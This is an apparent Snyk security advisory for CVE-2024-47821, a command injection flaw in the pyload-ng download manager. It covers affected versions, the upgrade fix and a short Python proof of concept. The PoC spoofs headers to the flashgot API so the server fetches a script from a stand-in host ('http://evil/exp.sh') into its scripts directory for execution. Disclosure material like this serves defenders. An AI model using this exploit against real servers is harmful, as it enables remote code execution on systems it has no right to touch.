Command Injection Affecting pyload-ng package, versions [,0.5.0b3.dev87)
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-PYLOADNG-8309126
- published 28 Oct 2024
- disclosed 28 Oct 2024
- credit Anuraag Baishya
Introduced: 28 Oct 2024
New CVE-2024-47821 Open this link in a new tabHow to fix?
Upgrade pyload-ng
to version 0.5.0b3.dev87 or higher.
Overview
pyload-ng is a The free and open-source Download Manager written in pure Python
Affected versions of this package are vulnerable to Command Injection via the flashgot
API and the download process. An attacker can execute arbitrary code by manipulating the download path to target the scripts directory and spoofing HTTP headers to bypass security checks. This is only exploitable if the server settings allow changing the download folder to a scripts directory and the permissions for downloaded files are improperly set.
PoC
import requests
url = "http://pyload/flashgot"
headers = {"host": "127.0.0.1:9666", "Referer": "http://127.0.0.1:9666/flashgot"}
data = {
"package": "download_finished",
"passwords": "optional_password",
"urls": "http://evil/exp.sh",
"autostart": 1,
}
response = requests.post(url, data=data, headers=headers)